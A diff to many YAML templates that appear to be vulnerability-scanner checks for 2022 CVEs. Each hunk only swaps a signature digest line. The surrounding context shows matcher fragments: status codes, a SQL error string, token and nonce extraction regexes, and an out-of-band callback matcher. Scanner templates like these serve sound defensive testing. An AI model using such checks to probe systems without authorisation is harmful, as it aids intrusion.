file diff --git a/http/cves/2022/CVE-2022-2174.yaml b/http/cves/2022/CVE-2022-2174.yaml index 4d07749ca7..2d9e48b977 100644 --- a/http/cves/2022/CVE-2022-2174.yaml +++ b/http/cves/2022/CVE-2022-2174.yaml @@ -45,4 +45,4 @@ http: - 'contains(body, "") && contains(body, "microweber")' - 'contains(content_type, "text/html")' condition: and -# digest: 4a0a00473045022100f6985417c26c1547d8dff202063515e635531e5ceca292245602fe631ff2516c02202581d526c39c3641918d4c48d58cc9c8c6bbefda5577e0e4709485909f34b518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2014f47b7e4f20c289778b2ac1b0285d2b7566e8d3a8df8f1a1bd6860f006c5022100834238ffccb7ac91e050718f72cd5e8f4625e3d9d0341a498f0b7a6126782092:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2185.yaml b/http/cves/2022/CVE-2022-2185.yaml index 51695f9810..92cc18f481 100644 --- a/http/cves/2022/CVE-2022-2185.yaml +++ b/http/cves/2022/CVE-2022-2185.yaml @@ -86,4 +86,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' -# digest: 4a0a0047304502210091dcf6a4c8bd09fbeeb41655c5d4c986098222a5860b2e925c122c60a22a1d2a022035fc0b1692dfa52751798112a96c8a34866bb3216db13229a705a9c7593792a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3850c67ef8849e5aa70da23e73723c97d7a09357ba5e2897fbe20675793968b02210082888ecb2063bb7e33482f5d6661246ccb5d2be69ff2a8ecd963eca64512d5b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-22242.yaml b/http/cves/2022/CVE-2022-22242.yaml index f5fed52599..67f4077364 100644 --- a/http/cves/2022/CVE-2022-22242.yaml +++ b/http/cves/2022/CVE-2022-22242.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b38cf338a400864782fb2b8fa554997f3576bda5c92ab00e47c1675f35d0e6c002204e0cffe450619d486639001c1e191fa092e747b00daee7508cb4232d2bd86bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009dc11da385441b20fefa008fe30a2f64d3f86c3f88be834410002eca142f3b0e022031318c98ea766ad592c15d83c16ceb4d968f230131e11cd53d71430773c7a06b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index fe125674f0..7788fd4c4f 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -89,4 +89,4 @@ http: group: 1 regex: - "\\s*\\s*<\\/version>" -# digest: 4b0a00483046022100fa886b63f46880ebc3ac311badf4173457c77333ee6c3119602d1ae1906343d6022100b40e5474b7dee7644024669adae67a822b8dd7a5e7d62b87095e51ee170e44c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c0cb2e876172f6211d6fcb96032efbe0dd66aff65e487c755e8e0ff7f2ec891022100de0684da9de47c45b49e8d5fd0d27431496f863244c33bc5d1c1a3805bb41447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2290.yaml b/http/cves/2022/CVE-2022-2290.yaml index 0242bdcd9e..321a8b982e 100644 --- a/http/cves/2022/CVE-2022-2290.yaml +++ b/http/cves/2022/CVE-2022-2290.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 404 -# digest: 4a0a0047304502207d4b9d0dd7db8604f49b68a73921584bf25c3610f646ed591427eeb879bf02bf022100f140a1c0ad71e73608d07305c2f2491636ffe5ca5e1d15f25752d225ee1db631:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d30362b6d681b6b532b5b9d0e0de0183446a3d6e63cbbc52fa25f57cbcd9573102210096a5a9f8e18a07ee00f58819fd8346bd275fc7ba0a16e1e8944ec64cfc43cfb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-22954.yaml b/http/cves/2022/CVE-2022-22954.yaml index d35b519f2a..1064ad8a66 100644 --- a/http/cves/2022/CVE-2022-22954.yaml +++ b/http/cves/2022/CVE-2022-22954.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 400 -# digest: 4a0a00473045022100c5fadaee1fdc23c68d0736dd5211cefc7df92b701c8ca5e3d1e04955bf3529a802206b7507fdb78dc780e98f43075c61ce613e776ef12591f1cda7afde1c0812fd89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a062caf59a740465c52f937e170d99bfcda44e1b1e720c2928be79835e4bdea002204084645bafb541f91f014d4fad493f0c4213522cbec24d6c04d481668dabc49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-22972.yaml b/http/cves/2022/CVE-2022-22972.yaml index 4d3fead3ea..c7198ddb0e 100644 --- a/http/cves/2022/CVE-2022-22972.yaml +++ b/http/cves/2022/CVE-2022-22972.yaml @@ -115,4 +115,4 @@ http: kval: - 'HZN' part: header -# digest: 4a0a004730450220465c7b144e1da06f22f19d8ce3721f0ecb54576aa496fe1b2d7b92976567af82022100ec728eb918894cc3c3a6a9c86736a12d36d5ae58ee64a3a5ac7b9dc55d5efb16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220491c416781d0835cd14195ff295259140499a348a3e1762d82c65458a180071b022071502dc4cb67e06cd33b50ad9a1943a5e0e76edb016ae8fd7120cac0a1f50e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23102.yaml b/http/cves/2022/CVE-2022-23102.yaml index 2f0900c2e1..3610aba99a 100644 --- a/http/cves/2022/CVE-2022-23102.yaml +++ b/http/cves/2022/CVE-2022-23102.yaml @@ -63,4 +63,4 @@ http: regex: - "name='csrfmiddlewaretoken' value='(.*)' />" internal: true -# digest: 4a0a00473045022100e726bc984b4453e97e98b8e85fa29516c8151ce4e43476fd3b1a4ade88bb194202201611c0c866c7346f933cf93d49e700965d8d040cb85062a5e76bf3572ce5d2a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022079cc33f1cc908eef893230c347c8ce3e8f124d6750ac529661e567415a67261b02203dd96b6f3671048cf76f1864b1a4ff0e738a9c4960b867fc5ebc35298261b9c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23131.yaml b/http/cves/2022/CVE-2022-23131.yaml index 3508784879..b2a66809ce 100644 --- a/http/cves/2022/CVE-2022-23131.yaml +++ b/http/cves/2022/CVE-2022-23131.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 302 -# digest: 490a00463044022072048b8940344880d8269406d951ff30d4d1f4e3c7ccb7a910f08f25ad8fc1ee0220569d36346c01e0e5151b8041459814264f976af8f12529f6724e67e1393b8350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220038144dd55c85d0a124a61d1ffc11775fb23e3b7133cef74d5a1d2172e6a609f022100ea2c683f74e486783fec54e2e5ab445c4684be37422a32d592536917eb9819cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23134.yaml b/http/cves/2022/CVE-2022-23134.yaml index c289d30fcc..8c6dc2e6ea 100644 --- a/http/cves/2022/CVE-2022-23134.yaml +++ b/http/cves/2022/CVE-2022-23134.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008f63071fe2e7458978a60978f0c71cfc32245fcdbda7c1b3647dd3a1941df683022100904eb02220fd7d7ef22d9f5b35dace0e9bd88ebd4e6b6db6d740f7d9cb7ecc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3b976dacc76a5f92bdb9a92a48c13c9d2a79f3c0265767f8a6410a5278c67aa022100c2ed5ed747658cf421d35c4bd70fb2c1bd723f4d8782d3627c3bf66f8c05eb62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2314.yaml b/http/cves/2022/CVE-2022-2314.yaml index f64ac52f8f..81fd5485d6 100644 --- a/http/cves/2022/CVE-2022-2314.yaml +++ b/http/cves/2022/CVE-2022-2314.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206692348e2633018a23d148415e047563294843e45c7b5ee7d28a232472ccfa8a0220754a5291e01ce0d4ea4c998c533782d53abed0b92402761dd3c6984b8e34ac71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e3ec8a877f0add412d772250cca442c4f14251f414668bcc33927cf31d37c2c02210096bae018714fa494a24f5547acb225e394bffbb1504ec62ffd1f8100d62731c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23347.yaml b/http/cves/2022/CVE-2022-23347.yaml index 4ce3c4eac9..40499a0bf2 100644 --- a/http/cves/2022/CVE-2022-23347.yaml +++ b/http/cves/2022/CVE-2022-23347.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200af965d705b6349bbe693a098ac61569dacf962ec30979617fe74349dbe6100302200a383464c76beb39b14fcc75cdde737452c65881b414e006117db4612fd0dc7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b43aeb9c6555299a14b9ecf0389b61f16cbb2fa88477e41dce1c97a48dbbb993022100f7c5f17d61c27c37d23fffbe66849000391a654c0fd72ccdd51525cc88ac476b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23544.yaml b/http/cves/2022/CVE-2022-23544.yaml index 7e4ae206a2..6ee0ab7d17 100644 --- a/http/cves/2022/CVE-2022-23544.yaml +++ b/http/cves/2022/CVE-2022-23544.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bf52f0abf43d9d53211d5cf9d863562c17feea81de9e6840d0746683786ece8502202e6c5624ad92ce8bf73522f994e525b0df9fc608117d63935c617f047934523b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064c48dbddea6759a4b1d98387f4741e455f2719c480890a557f43459af8d86db02202c998413ed0cf079539aa5f86471364ed714c32e12b13eeb93d7c149d7240dad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23779.yaml b/http/cves/2022/CVE-2022-23779.yaml index 0b60119936..c802557e63 100644 --- a/http/cves/2022/CVE-2022-23779.yaml +++ b/http/cves/2022/CVE-2022-23779.yaml @@ -74,4 +74,4 @@ http: regex: - 'https?:\/\/(.*):' part: location -# digest: 4a0a0047304502201317441623c4ee42d53822d425ac631e136dcb492b9e6cb2957d1320006f059a0221008bbea5add0bf9b5a3d476c5e3ff16ad3b3727fdb3db68dd2e5a0773367653f0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059ae9b976c72cbfbe4f4958cdc0a988750b3fd98fc9241e44218be22b187b0f8022100d867dad1b194e51af5e3958c56fcd834019dff363c9be90a4af198bdb1bfdb1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2379.yaml b/http/cves/2022/CVE-2022-2379.yaml index 7ae533b31b..889f1f8f87 100644 --- a/http/cves/2022/CVE-2022-2379.yaml +++ b/http/cves/2022/CVE-2022-2379.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1f2b124c765614d3ab35ff74edf5bbb68b70131be4b3b60a91c089395bc21a802200331ef6a4224f062eb1af5715667a63cb2fbc4407cd604a4a3dc649f383eef79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f64124133407f75d8bb262919179f2c3a4c57c530c8031ad726a956489b3aae802202e35452a7f46e4c16142d1dcbf6a666a30247e235d323c3a12e3bb5b0d060a22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23808.yaml b/http/cves/2022/CVE-2022-23808.yaml index 5874d9dd08..b9d422c52f 100644 --- a/http/cves/2022/CVE-2022-23808.yaml +++ b/http/cves/2022/CVE-2022-23808.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a542df8928fda0eda5a27a039adbd4bac163d3acacc5d996420e197e0076555022100b7d92e6e1f8628d4e6ee9b565e463f7d23e47b9908de66741b7597971f97c4e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d51dd72332aa48ee6c6d366dc0abea1dc8e6e62bfb44eeb56cfbdc5ba38bf6f02203da6be1a32f71f2b9311be26e17356c2f694f4d5a7184bc0559db638c9748d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2383.yaml b/http/cves/2022/CVE-2022-2383.yaml index 0a986decfa..fa35495cd7 100644 --- a/http/cves/2022/CVE-2022-2383.yaml +++ b/http/cves/2022/CVE-2022-2383.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b90e70131c94da51d535693738cbe3d0079fc3b61e920c12c0b8285a8918b24f022100b23d81b7d61dfbe3e6b9deb619a56fe0fe75a1d550db0394ff670592d4639831:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022057b9560a730e4f4b9070196ff4dded2d566d4eda9932dfa5808938ddb4455a98022004c2742021fa162c4492a5cfaef5d68f9ff39fb39e2e0788ac8cbf6bd6c2bbc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 682158a5e9..822902e0d6 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ab91f33be5a1b866f386ddc511c3ca5ebc8802c4bdb06ac96a58bc521bbda2302200950c9e67d9215b323ad706aa3aac52b7eac94d7273f0c76e6d6438197ff1ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031799a5dbb67f8926ae45a12983c3204311392acfbf3b494457a9a649d8da1d5022100e08566b43eab4c95c552f11e578e6bbd9ef4b3209043f2663c4bdd35750449e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-23898.yaml b/http/cves/2022/CVE-2022-23898.yaml index c551eb69fd..fea5382dd2 100644 --- a/http/cves/2022/CVE-2022-23898.yaml +++ b/http/cves/2022/CVE-2022-23898.yaml @@ -49,4 +49,4 @@ http: part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' -# digest: 4b0a00483046022100ef396a4ae16fdac8ad54b39fa29c7c9284c1545942a478fb520f13f5aa55d490022100e8a51638cde6b033fdde1499414be6b41fb7821c06b817a0ab4bfc08ea4d9ab1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc5553508244fcbe287318d8d8a5ea2a38052fc42f3ede3701b2172ced02d55d022100ac511822ab5128a9f658641fa3504f6fa7a0e5bd43b00e23b720713c3487330b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24112.yaml b/http/cves/2022/CVE-2022-24112.yaml index a0ca8f7ff1..10dc3c7da4 100644 --- a/http/cves/2022/CVE-2022-24112.yaml +++ b/http/cves/2022/CVE-2022-24112.yaml @@ -88,4 +88,4 @@ http: regex: - GET \/([a-z-]+) HTTP part: interactsh_request -# digest: 490a004630440220252fa33dbfa2310707c3ece4b558e069eced762e4555af201452b6c8a330cbf7022066dde67ccbf9848eed1cdb573e2f17075ba3c8a922acfa7505f655707d4a7f36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb584340cf6c0a8fcee955ec9e45cb164c577964561b901b44f850375c961204022100d2361fce0740b33a2435c2a05e3bc87a0edd83bade945888cec77fd9d8886f1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24124.yaml b/http/cves/2022/CVE-2022-24124.yaml index 25b04466fb..f53512c0f4 100644 --- a/http/cves/2022/CVE-2022-24124.yaml +++ b/http/cves/2022/CVE-2022-24124.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c612a4d31efde072d283f204c1a5fc39505aa63d6eaece6f896e3ec1bc55835f02210083b267e2403cc0c94bed127191d0a4cd5591ccc89ad545110682a6db0d90a239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f560744db8782ad612535dce9ba7773e911e30d89e3e9f020cf9023070d9fa8f02205b14f25f0640a9571259918031d458ce3e19a9c280767e1f6680d98b553e5ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2414.yaml b/http/cves/2022/CVE-2022-2414.yaml index a5b83f27c9..f612b14933 100644 --- a/http/cves/2022/CVE-2022-2414.yaml +++ b/http/cves/2022/CVE-2022-2414.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 400 -# digest: 490a004630440220447a8b8a7aa556267fd14df0e02311bdc5813ebdf62e8d7c9135dc46e1fa0ae202205a9163f77bef36bd0bf25c577090f6844405f59471ffc33ff36fcd0cd5c6301d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e7ffe2984dc1d2a2a3b9f295743656980d146a512bebd2f660485641430f47a022100de7db647d6adc79aa3d8285c0fd9c6034f7eda696a613a144fd601578c83689f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24260.yaml b/http/cves/2022/CVE-2022-24260.yaml index 4b04a25393..bf52380c7c 100644 --- a/http/cves/2022/CVE-2022-24260.yaml +++ b/http/cves/2022/CVE-2022-24260.yaml @@ -61,4 +61,4 @@ http: - type: kval kval: - PHPSESSID -# digest: 490a0046304402207801cc33ae61f305122b121a26a4e5d09a93f15745468b0c89e06201aa2887ff022068da747ae2180fe7db3e41aa513a1aded13daa13ff159fe9a591d7d813a0692a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d6869e3e6bdab153abbfabdce5e5fbcd3e739cfc04943e1b55347744b270a7e02205c0a9ef1792f2a52a3cfdadcfdd833047800aa4fef70cae85061c82631854375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 4335f7155b..b36d6c8a9a 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -53,4 +53,4 @@ http: - type: word words: - 'foo was passed in via Airflow CLI Test command with value {{ params.foo }}' # Works with unauthenticated airflow instance -# digest: 490a00463044022075eb3318af18ddadc650ede8e533de17cf1e2544d557b61a554123f3a87ad8a90220793511c5302d29e7a72938e419df17270bfb6dc7a9c42a6c2ec94ca452a98e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf0ff7dd0ee04ceb95dc654c9e90e7eeb44d8f878fc279f63cacba826954d8e90220686086c425c836af53e8db52206faf009814f85e2cd3ea7e274069e4857d138a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index c7f071301a..dd71dd85cb 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c6ee70b9245c089a3f406d01f902c54a26c406fac6592650e59faa6311584fd022100a14c1a73652a9999f953fa755658caed5c22d516cf51b10d0c18cfc8ca40e2d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002dd1c02590978dc7ca4a1a527c6886b4a4544680790f66964dbaf5050100b43022100a5892b414ffa8a167c8d3e8276d57b19e83ca0e4440b54117e49dc4ddbc5c763:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24627.yaml b/http/cves/2022/CVE-2022-24627.yaml index 68e1794fa6..e2aff5e25b 100644 --- a/http/cves/2022/CVE-2022-24627.yaml +++ b/http/cves/2022/CVE-2022-24627.yaml @@ -58,4 +58,4 @@ http: - "mysql_fetch" - "You have an error in your SQL syntax" condition: or -# digest: 4a0a00473045022100ba45b549e145408af633369b555485543fadac44bdd9055d24dd3b1aa2b7e6810220618bc9f7d62c05f168255ce97860dc0e76204349a61ffc57a6cefa9bf39a650c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce764ec3b5fb69729ea019f6c553719a3cf8dea0f4676a61baf2c01c330417ea022077e1d898abff31334bd6321de91b4a74e18d7a16259ffcd72d008a752c2a1b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 51cafeb918..ce02a3fc46 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -68,4 +68,4 @@ http: - '"BUILD_NUMBER":"([0-9]+)",' internal: true part: body -# digest: 4a0a00473045022100e403ff912f48b0e4fc56a34aec2e8071bef293f7da2685cf615e8936416b411e0220071346853de912a910b2ce5e9e08fb45b83a98a0613c4a4c853eede70a3a4d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201434607f3603b54370da4674f0654876c820ffaa40b99601ae593a10e0cecf0602201fa42fa3aac69e98c3313106177ee2db92340b96a1a6d2025a1db4064259e090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index 4683216a4e..a46f03ef34 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b49c9a139031348d88e1292989218d050053caab0f929919163e12f6acd9755602207766eeef16b7181d17e57c0c9c44a82352ad8c1e21b61fd731ef973885726d87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2fd07464d7b871b9aa3008881ba4d3a3b63e5049346e492ca492cec6d8e3762022100e017918e75f6dfa54c02e2ea3f1f33b6c69500cc4e904abd9d8d1ce67ec3aacd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index 6683437020..d1bd581195 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -83,4 +83,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c43a89e6024f154e1c9ec73d2af5b54a9fe62ce9de2200c4c749d86d684bcac02206e61c587bb72efa57e89b3e5d7522186d366d6693a3fefd7dcf278d233235347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076ce5c262b52d57466f3af023a28399c27dd8a0a2af7b210a24268a853de1ca00220187c683fede76e3625142f084c4ea680c65454438ff7186f71bbab5027937147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index 5be8e1968b..5864fd1413 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bc612064e3643df18f893c74277d70fb9a15f6e13eb9f85f3a0a3bb6126f3aad02203177b61a36e74d7ad2cd14484de16a71d302ce8247adacd4eeb7d5eecb5a0920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d5efea1d7e0aebaf8dcf58938cef6794ce2b8e92534ab5030ce01c9f54fa46570220668b520a1f400bed5e9f77206b98c2c7a3bfdec16b01741ff05a4acf9336aa76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index 1a5a25e249..af96c05d91 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100ade2be3b76793478fedfa3024140b02e074968d76d3d8baf0b3309c3eb528c670220702937b18bd3eda17f033654fd689cf0ba239e82e0804bd4ee53eb336caed0cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051495ba52bc4bb6e705b85e848bec11a34d35068384fc1f5af1f0e273d197e43022100e2c65f409ca850f008fe843e5f21cca3000c6d0022186e16fc361dbf00c37088:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 4a031a0417..b7bf57511e 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml @@ -56,4 +56,4 @@ http: part: header words: - text/html -# digest: 490a00463044022041033a219f77db0b218a8c5c9051700448dd1a31a46099f056f2d466e1ade55202202c4b80b0623b0b70c68495ceefcec3005b91cf5c32dc9efef87c34b544d07c2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5b324c92b0c8deaee51afc9f3e11d001bdd71722f0fdc1611f2e943a1b27450022100a04c5f7a7f3f6638a11698146c51d16668f122c1cd38487319db4c95f2d3ef80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index aa7eee32f2..be19505e94 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ccfe394bc6b8b31a756bb60d7542f8fa5d38bf65d3321043f1b75787cd1df0d022100e3ca4a315ae22f1611dd448073eb23a4fb2ad50d182e63e1037d0e816c1544a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a49c79dfc2c0e60852f8b712b5feb8e72d4ab29779294a1e23adee4654c418302205d6f2e095cdf4504449179d0a3eb5fc923e9d7b20cb793c8b828f9832e6e32e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 5a4f659d3d..9708c7bc6e 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -54,4 +54,4 @@ http: part: header words: - "application/json" -# digest: 4a0a0047304502210082b6a248202fef50a86c36616626d308355488ad6aa5d4ef24b183158f17b9b0022006b63a9e980e50f042f60dbe4457b4bd55a23a77f4cc51ce5d2057ae661a61b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cccf9d0e2f1789b898289d5bb9041fbec265850c276e6b526581e0c499a89a7f022037f6f92d5ee852d6f05f78fedb90254c45fd7f3a354c7fdd7a957808cca3696d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index ae3075df31..909a8a147d 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4b0a00483046022100c1b3089f521497de75a298ec2b19e76ba63b440b3be4c4d1992763acf0111ec10221009de03d65b6ddf4245ec60b34a6670600703456d29976cbc448386780ec3e0e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072faab74dc197723560c42afb7117d0c5715534d9bfb2f93a51100d21e3a444f022100fbf2abb052b030dc6c4cd64af882a4ff76b3228d04087d5bb31ac4ab1c3914ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index be6c12c2f9..d9afc94118 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -59,4 +59,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4b0a0048304602210084f2ef26eebc2ab228387073ab5586b446941d803b2fa941c7b7294dcc365f64022100b10e0d2b493485ad23cdee2ee00592ddc459576e58f2fb9d306f92129672792c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022062784fbf42df0ac73bf29c53f7ca94bd834c9c4abcd55a2431131b7700d44db1022100b33b82d8cd5c07fa39ef4a725f4b77733f160d173b1773fecdcb25f4afb5a7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml index 355f3a1c3e..2832e5ba0f 100644 --- a/http/cves/2022/CVE-2022-2535.yaml +++ b/http/cves/2022/CVE-2022-2535.yaml @@ -42,4 +42,4 